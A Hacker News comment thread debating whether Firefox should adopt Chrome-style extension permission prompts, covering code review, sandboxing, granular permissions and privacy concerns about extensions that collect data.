
Mozilla shouldn't copy Chrome's permission prompt for extensions - bobajeff
https://palant.de/2016/07/02/why-mozilla-shouldn-t-copy-chrome-s-permission-prompt-for-extensions
======
kettl2
Having spent some time looking at the code of popular Chrome extensions
recently I was left really shaken about whats happening under the hood.

Google's position seems to be, if a website can track you and monitor your
behavior when you are on the page, then an extension should be able to do so
too. But the extensions have a whole lot more capability. They can look at my
history, bookmarks, all the fucking tabs I have open and whats happening in
each one and send nice reports of to god knows who.

If I download a simple task list extension and every word typed, mouse move,
click etc is being sent to Google Analytics I would like to know that! Cause
my expectation is its a simple list being stored locally on my device not
being shared with anyone. Same goes for history stats extensions. Or
reddit\youtube filtering extensions. Every single extension I looked at was
hooked up to some analytics framework/cloud backup/sync service or the other.
If some third party dev sitting in his mom's basement is collecting all this
data. I want to know!

The best was the history stats extension I had installed. Very useful/pretty
reports/code on Github/nice backstory about a benevolent developer building
something cool for the world in his free time etc. When I dig around the story
changes to the dev disappearing after selling it off to shady characters, who
then proceed to do things like randomly redirect pages to ad sites.

At install time there is no reason Google can't say this extension uses Google
Analytics to track where you are clicking etc and what data and how much data
is being sent off everyday to god knows who.

~~~
robryk
> At install time there is no reason Google can't say this extension uses
> Google Analytics to track where you are clicking etc and what data and how
> much data is being sent off everyday to god knows who.

Let's say Google started to do this in a way that causes people not to want to
use such extensions. Why do you think extension authors would stop using
analytics as opposed to use some other analytics provider (that is on average
more fishy security-wise)?

Disclaimer: I work at Google, but not on anything Chrome-related.

~~~
hvis
Then the extension would have to similarly say, on install, that it sends
analytics to <fishy provider>.

Which would make the user want to use them even less.

~~~
geofft
There are self-hosted analytics solutions, and worst case, you can always
reverse-proxy to Google Analytics. So the extension will say "MyExtension
needs to comunicate with MyExtension.com" and nobody will know why.

(Unless you have a manual review process, of course.)

------
kalleboo
It sounds like a case of overly broad permissions. Have they looked at other
permissions models?

For one, extensions should be able to include an explanation why they need
each permission.

Network access should be a separate permission like it is for iOS keyboards.
It's safer for an ad blocker to read and modify a page if it has no method of
exfiltrating the content. Blacklist updates can be done through the regular
extension update mechanism.

Looking at the list of permissions in the documentation, a lot of these look
like they should be asked for at the time of first use (location, clipboard,
screenshots, etc). This would avoid the problem of asking for overly broad
permissions upfront "just in case". Android had the same problem.

But in the end, not informing the user is the wrong choice, no matter how
bullet-proof you think your vetting process is. You'll always have users who
are paranoid (as developers of a camera app on iOS, we've had 1-star reviews
left because our app "uploads all your photos to the internet" because we need
photo library access) and it's their loss mainly, not yours.

~~~
ytpete
> It's safer for an ad blocker to read and modify a page if it has no method
> of exfiltrating the content.

The problem is that being able to modify the page _is_ a method of
exfiltrating information - e.g. you can add an img tag triggering a GET to an
arbitrary URL. I suspect it would be surprisingly tricky to try restricting
page modification in such a way that information can't be sent anywhere the
page wouldn't have sent it originally.

But +1 on deferring permissions prompts until the moment the app actually
needs the privilege, though. It's worked pretty well on iOS, and it's finally
coming to Android - maybe it'll come to Chrome or Firefox next.

~~~
dgoldstein0
couldn't we just give adblockers an api for filtering network requests, that
they could just decide to allow or deny requests? And then give them no other
internet access?

This seems like an API failure that common jobs for extensions can't be done
without scary permissions.

~~~
roblabla
The problem is, many adblockers also have a feature to disable certain DOM
nodes inside websites, to avoid embedded ads or remove anti-adblockers. So
you'd also need an API to filter out certain selectors... And the list of
specialized APIs could continue on and on.

~~~
madeofpalk
Apple kind of solved this problem with the Content Blocker API - all of this
is defined in a 'static' list which is used by Safari to block certain things.

------
greggman
Maybe I'm the only one but I want "ask me every time unless I specify
otherwise" permissions

A password manager doesn't need to read all my websites. It only needs to
read/modify the moment I press "fill in my password". Same with a "screen
capture and upload to cloud" extension, a "bookmark" extension, a "post to my
feed" extension. Yes an ad blocker needs all permissions. The rest don't and I
wish I could be asked or at least distinguish between the permission to read
everything and the permission to read on click

------
amelius
I think a permission model should have 3 choices for every question: allow,
disallow, and pretend.

With the last option, app-makers cannot bribe the user into installing the app
with unwanted permissions anyway.

For example, when the app wants file-system access, the "pretend" option would
give the app a view of an empty or dummy (fake) file-system. When the app
wants access to GPS coordinates, the "pretend" option would give the app dummy
coordinates. Et cetera.

~~~
tetrep
I don't see "pretend" as being productive. If you're dealing with an app that
would otherwise refuse to run without a permission, even if it didn't truly
need the permission to function, then it would simply escalate the arms race.
It would be pretty easy to detect a fake filesystem (try to write a file, then
read it back) and spoofed GPS (GeoIP, ping supposed nearby servers, etc). And,
of course, these checks could be encapsulated in a convenient library for
developers to easily use. Then you'd have the browser's response to this and
we'd end up in the ad-blocker-blocker-blocker world in which we now live, only
we're wasting the time of developers who would otherwise be doing productive
things (more browswr bug fixes/features). At least with the current ad-
blocking mess we're only wasting the time of adtech.

~~~
jimrandomh
Yes, but at that point they've lost plausible deniability; they can no longer
claim that they asked for permission because some obscure feature required it.
People are much less likely to agree to "trade my filesystem for a game" than
they are to agree to "play a game that uses the filesystem to save games".

~~~
drdaeman
They tend to just say "we need this permission for the application/extension
to _work correctly_ ". And stop at this.

Seriously, a certain (quite famous, 5M installs) app got an update that
requested a permission to install packages (!). It was actually harmless, as
granting this won't work - the system won't allow this to non-system apps, but
nonetheless it had just looked wrong.

I've emailed their support, asking why is it there. And - guess what? The
reply was, essentially, "we need it because we do, it's required for the app
to work, sorry but can't disclose the exact details". Well, polite, but
essentially like this.

Long story short, I've accidentally mentioned this on a friend's blog, and my
comment was noticed by his friend who had connections to the app's company
(world's small, hah!) - so the ticket got elevated and took a proper review.
Result is, this had just accidentally slipped from some dependency's
development builds. Or something like that. Got apologies for the dubious
response and a discount coupon, and the issue was fixed.

The thing is, it seems that a) I highly suspect, most users don't give a
second thought about about accepting this permission (would there be more
reports on this, I guess, the tier-1 support would know about the issue and
the response would be different) and b) the initial attitude is "we know
better".

------
_nedR
I don't agree with the article at all.

Chrome is being completely honest with the user. If a youtube extension asks
permission to "read data from all websites" you must ask yourself and the
developer why it needs access to all websites and not just youtube. A good
extension must enumerate all the permissions it demands and give good reasons
why it needs each of them. If an extension seeks new permissions, then consent
must be sought from the user before update . This is obviously the correct
approach(How it affects the extension developer's revenue\user-adoption is
unimportant). Chrome's model is comparable to the security model of Android
and iOS. Sure its not perfect, But its much better than the firefox model
which is comparable to Windows 98.

Also i don't understand the whole shifting of responsibility jibe. Does
Mozilla review every extension and every update in their store? Do they accept
responsibility if malicious code is downloaded from their store?

To conclude , i would like firefox's stringent app review process _and_
chrome's fine-grained permissions and sandbox model.

Edit: I want to point out that this article is really looking after the
interests of the developer, and not after the interests of the user.

Edit 2 : Also to add: Sandboxing is simply good security practice. Even if the
author is not malicious, but in case an extension is exploited due to a bug,
the damage done by a well-sandboxed extension is limited by the permissions
granted. In firefox such an exploit could hoover all your data, credit card
info & passwords from all your websites and data from you harddrive as well.

~~~
Manishearth
> Chrome is being completely honest with the user.

The article is not advocating otherwise.

A _lot_ of extensions need that permission, even though they only need it to
do something much more specific. Adblock uses it to read (but not transmit)
your webpages, and remove sections. Password managers use it to scan (but not
transmit) webpage content, and fill certain form fields.

If there is a review process (which Firefox already has in place), then you
can actually give out permissions like this. You can ensure that the data read
from the webpage is never sent to the server, and useful things like that.

I believe the proposal for webextensions in Firefox is to have certain kinds
of extensions get auto-approved, the ones which need simple, sandboxable
permissions (not "read all my webpages"). Extensions that need more
permissions will need review, and they can request semantic permissions
instead of just "give me all your data and trust I don't do anything bad with
it", which is bad and has already lead to issues in the past where a Chrome
extension developer sells their extension which is then used to transmit
malware.

> To conclude , i would like firefox's stringent app review process and
> chrome's fine-grained permissions and sandbox model.

The article is proposing finer grained permissions than Chrome.

~~~
_nedR
>A lot of extensions need that permission, even though they only need it to do
something much more specific. Adblock uses it to read (but not transmit) your
webpages, and remove sections. Password managers use it to scan (but not
transmit) webpage content, and fill certain form fields.

Yes. But the user should be made aware of the consequence of their action. Do
they realize that installing a password manager means granting access to all
their data to a third party. Is this author reliable? What do other users
think of the author? Has anyone reviewed the code for this? These are all
questions potential users should ask.

>they can request semantic permissions instead of just "give me all your data
and trust I don't do anything bad with it", which is bad and has already lead
to issues in the past where a Chrome extension developer sells their extension
which is then used to transmit malware.

A lot of things cannot be controlled either by review process or sandboxing.
What if your extension has a web-component ( say your password manager backs
up passwords to the cloud)? Mozilla cannot review your server code. A sandbox
won't protect resources you have already given access to, but it will limit
the damage done.

>The article is proposing finer grained permissions than Chrome.

I have reread the article and haven't found anything that backs this
assertion. Indeed the author seems to say : Mozilla vouches for me, so you
trust me with all your stuff too. From article :

'Wouldn’t it be a better idea to keep doing that so that the installation
prompt can simply say: “Hey, we made sure that this extension is doing what it
says, want to install it?”'

Edit : I agree that some form of review is needed for extensions. Simple
sandboxing alone is not enough. But article doesn't seem to support
sandboxing.

~~~
Manishearth
> Yes. But the user should be made aware of the consequence of their action.
> Do they realize that installing a password manager means granting access to
> all their data to a third party. Is this author reliable? What do other
> users think of the author? Has anyone reviewed the code for this? These are
> all questions potential users should ask.

No. That is the point I and the article am making. If the addon store has a
review process in place (again, Firefox has this), it is possible to verify
that the password manager is not leaking data to the third party. The answer
to "has anyone reviewed the code for this" is yes.

> What if your extension has a web-component ( say your password manager backs
> up passwords to the cloud)? Mozilla cannot review your server code.

Yes, in which case they can say that it grants access to all your passwords. A
password manager that encrypts it correctly won't need to. These are semantic
permissions, so you can differentiate between the two.

> I have reread the article and haven't found anything that backs this
> assertion. Indeed the author seems to say : Mozilla vouches for me, so you
> trust me with all your stuff too. From article :

"For example, a reviewer could determine whether the extension is merely
modifying webpage behavior or actually extracting data from it. " \-- this is
_exactly_ more finer grained than "can access everything". Addons that don't
need any sort of access permission can still be sandboxed to not be allowed to
access them. It's not clearly spelt out in the article, but from what I've
heard/read the system is planned to be something like "If you don't need any
dangerous permissions, you don't need review and we will sandbox you. If you
need something that can be abused, there will be a review component." This
article proposes that the review component be used to further improve the UX
of the permissions displayed to the user.

You bring up a valid point about trusting the reviewers. Remember that since
this is more finer grained, Chrome's coarser machine-verifiable sandboxing
permission levels will still exist underneath. It would be interesting to
expose a mode where it shows the "if you don't trust the reviewers, these are
the software-enforced permissions the app has".

> : Sandboxing is simply good security practice. Even if the author is not
> malicious, but in case an extension is exploited due to a bug, the damage
> done by a well-sandboxed extension is limited by the permissions granted. In
> firefox such an exploit could hoover all your data, credit card info &
> passwords from all your websites and data from you harddrive as well.

The article doesn't say it's going to avoid sandboxing. It's building a finer-
grained semantic system on top of the existing review process and sandboxing
system.

> Edit: I want to point out that this article is really looking after the
> interests of the developer, and not after the interests of the user.

How? An addon review process is explicitly worse for developers. This article
is all about exposing better UX for permissions, for the user. So that they
don't get desensitized to overly broad permission requests.

I feel that you're lacking some context on the proposal here; but I'm not sure
what.

------
kartickv
One concrete privacy improvement is to identify subsets of existing
functionality that are widely used and can be mapped to a separate permission,
or no permission. Then, most extension writers can request that specific
permission.

An example is Safari's content blocker API. They've designed it so well that
the content blocker doesn't know what it's blocking, or what sites you're
visiting. Apple didn't merely reduce the amount of private information
collected; they eliminated it.

Another example is iOS, where a permission is needed to access all contacts,
but if you just want to pick a content (say to share a document), you can
invoke the system picker without needing a permission.

The web needs to adopt such privacy-sensitive subsets of permissions in
addition to a blank cheque "access all data on all sites".

Disclosure: I work for Google, but not on Chrome.

------
deno
Even if they copy the warnings verbatim, I’d like to at least suggest adapting
some sort of icon set. Preferably with color coding: yellow for frequently
requested permissions, red for infrequently requested permissions.

Anything really, that let’s you know at glance what you’re about to install,
without having to read a bullet point list.

Colors are fine but unique icons would be even better. If it potentially
affects user’s privacy anything but a scary looking big brother eye would be
inappropriate.

See for example Facebook’s permission dialog from 2010:
[https://hyuz.files.wordpress.com/2010/04/gsh-1427.jpg](https://hyuz.files.wordpress.com/2010/04/gsh-1427.jpg)

The article mentions that CWS’s users rely on reputation. That is 100% true.
You basically have to go into at least the Review section to see if there are
any ‘surprises’ included inside. There was a time you couldn’t install a mouse
gesture extension without compromising your privacy.

The scary part is all your extensions are self-updating. If the author doesn’t
change the permissions they can include a backdoor at any time.

I don’t suggest they review the extensions manually. Instead what I would like
to see, personally, is just a simple setting to only show open source
extensions.

At least with AMO it’s very simple to check the source of any extension you
like. It’s right there on the extension’s page. Disabling automatic updates
and reviewing the source code is something I’ve done in the past.

If you combine an easily accessible source _and_ a comment section this alone
will increase security by a significant margin.

~~~
robryk
> If it potentially affects user’s privacy anything but a scary looking big
> brother eye would be inappropriate.

Well, what permissions don't?

~~~
deno
I meant anything that let’s the extension leak any data. Contacting 3rd-party
servers, modifying DOM etc. I suppose more granular permissions might be
required here.

------
okisan
As extension developer, it is easier to request "Access all web sites data" at
the beginning. The alternative for using optional (host origin) permissions
have to deal with complex UI workflows and often ask user to grant permission
that is already granted - due to Chrome bug not fixes for years[1].

1\.
[https://bugs.chromium.org/p/chromium/issues/detail?id=310815](https://bugs.chromium.org/p/chromium/issues/detail?id=310815)

------
appleflaxen
Chrome's permissions are not a panacea, but this article doesn't provide a
convincingly better alternative.

"code review" doesn't scale, especially at the level of a nonprofit, when
users are submitting their own add-ons. It may be that code review has a role
(it's a compelling argument), but knowing exactly what an add-on is doing is
really important.

One way in which it _could_ be better: instead of "internet access" as a unit,
provide a whitelist of sites the app can access. And, if the privileges change
in any way, flag it for human review and maybe even reset the review count.

~~~
carussell
Mozilla Corporation has over 1000 employees and the same kind of perks and
accoutrements of other Bay Area tech companies. The amount of revenue they've
received through business partnerships is measured in the billions of USD.
They sponsor events at hip venues with open bars and party-like atmospheres.

The picture of an overworked and frail non-profit has been out of date for
nearly a decade now.

------
746F7475
> _In fact, lots of confused users asked why Adblock Plus needed this
> permission and whether it was spying on them. And we explained that the
> process of blocking ads is in fact what Chrome describes as changing data on
> all websites._

Sounds to me that the permissions prompt is doing exactly what it should be
doing, informing users what the extension can do.

Sure it would be fun if there was a qualified code review process which could
gather all necessary permissions from the code, but with bigger extensions
this would take days or weeks to get right and unless you can get money out of
your extension that is a long wait. Like, I've made couple extensions I've
wanted and when I get them done and uploaded I just want to show them off to
few friends and install it myself. These are very much spur of a moment
things, if I had to wait through rounds and rounds of codereview and questions
about my code I probably couldn't be arsed to create extensions.

~~~
Manishearth
Note that Firefox has had this process for years, for addons with far more
power than what Chrome gets you. Sure, it is tedious and could be improved,
but the model works.

Also, I don't think you will have to go through review for extensions not
requesting dangerous permissions. For some definition of dangerous :)

(I wonder if both models could be implemented simultaneously -- unreviewed
extensions with "use at own risk" warnings, and reviewed ones with fine-
grained semantic permissions)

------
1ris
I don't see much sense in a allow-or-it-doesn't run permission/capabilities
model. If there is not a option for "make the app/extensions believe it has a
capability, but it does not" I don't have more choices then before: Install or
not install.

A extension could for example ask for a GPS location. I'd like to able to send
to app some nonsense data and use it.

------
ComodoHacker
The whole point about code review could change with the upcoming adoption of
WebAssembly. A lot of add-on developers will definitely start to protect their
source code. Especially for addons that do something shady, e.g. tracking
users' behavior.

------
J_Darnley
Why? They shouldn't be copying chrome's extensions in the first place.

~~~
Manishearth
More like building a much more powerful, standardized, extensions API that is
backwards compatible with chrome extensions (which offer relatively limited
tools)

It isn't copying, all the browsers want a standardized extensions system and
they have agreed on using Chrome as a starting point.

~~~
J_Darnley
More powerful? I though chrome's API was stupidly limited which is why firefox
had better extensions (all of which they want to throw out).

~~~
Manishearth
That is not the case. Chrome's API is just a base. The proposal is to be able
to handle most of Firefox's add-on ecosystem IIRC. The code would have to
change, but the functionality would be the same.

There is a lot of misinformation out there about Firefox's switch to web
extensions. Existing add-ons aren't going to be obsoleted immediately ; rather
new apis will be added first, and then they will be asked to switch.

Currently Firefox add-ons often hook directly into the browser, which is hard
to keep secure and makes it hard to evolve the browser.

------
cLeEOGPw
> Also, Adblock Plus could also read data as a side-effect, but it doesn’t do
> anything like that of course. The latter isn’t because the permission system
> stops Adblock Plus from doing it, but simply because we are good people (and
> we also formulated this very restrictive privacy policy).

Sure everyone believes you. Such an honest and genuine person.

~~~
JadeNB
> Sure everyone believes you. Such an honest and genuine person.

I think that this sarcastic tone is unproductive, but the downvotes are a
shame, as it's true that there have been ethical issues with ABP in the past:

[https://en.wikipedia.org/wiki/Adblock_Plus#Controversy_over_...](https://en.wikipedia.org/wiki/Adblock_Plus#Controversy_over_ad_filtering_and_ad_whitelisting)

------
gcb0
Mozilla copying chrome, and gnome copying osx: the two things that convinced
me that software patents may not even be a bad thing.

enough with being a copycat of every dumb decision just because the author
have market share.

and of course I joke on the software patents thing. but we need something that
can stop this sabotage of popular projects from within. I may have had time to
contribute in the past but nobody can policy or fork every project.

------
greendestiny_re
I once asked a Mozilla developer why does Firefox display "Adobe Flash plugin
blocked on this page" notification when the page apparently doesn't use Flash
at all and choosing either option (allow/block) doesn't impede its
functionality or change the appearance whatsoever.

The developer replied there are Flash cookies being set and it's possible an
attack could come through them. When I asked if he knows about any such case
happening, the answer was no. Then what is the purpose of bothering the user
about an attack vector if the attack is merely theoretical?

My conclusion was that software products normally stimulate adoption by
offering useful features but Firefox deviated from this attitude and adopted
what I call "avoidance of annoyance" – the user has to upgrade to the latest
version to avoid being annoyed by incessant popups and notifications that can
only be delayed but never permanently removed.

The irony is that updating to the latest version of Firefox will get rid of
the previous generation of notifications while bringing a new cycle, thus
ensuring users are constantly kept in a state of anguish and frustration that
will keep them updating for the sake of updating.

~~~
pcwalton
> When I asked if he knows about any such case happening, the answer was no.
> Then what is the purpose of bothering the user about an attack vector if the
> attack is merely theoretical?

I'm not OK with the philosophy of "let's not fix any security holes until we
find someone actively exploiting them".

~~~
greendestiny_re
You are using quotation marks as if though I said those words.

quote (kwəut) verb 1\. to repeat the exact words of a person as they were said
or written.

My point was about not giving the user enough information _to make an informed
decision_ yet demanding a decision anyway.

~~~
cbreeden
It's still not clear to me. Are you suggesting that uses not be notified of a
potential yet not verified security hole or not?

~~~
greendestiny_re
In short, I would like to see Firefox _empower and inform_ its users.

The current implementation of the Adobe Flash plugin warning does neither, and
by the looks of it, add-on permissions mentioned in the OP will be the same.

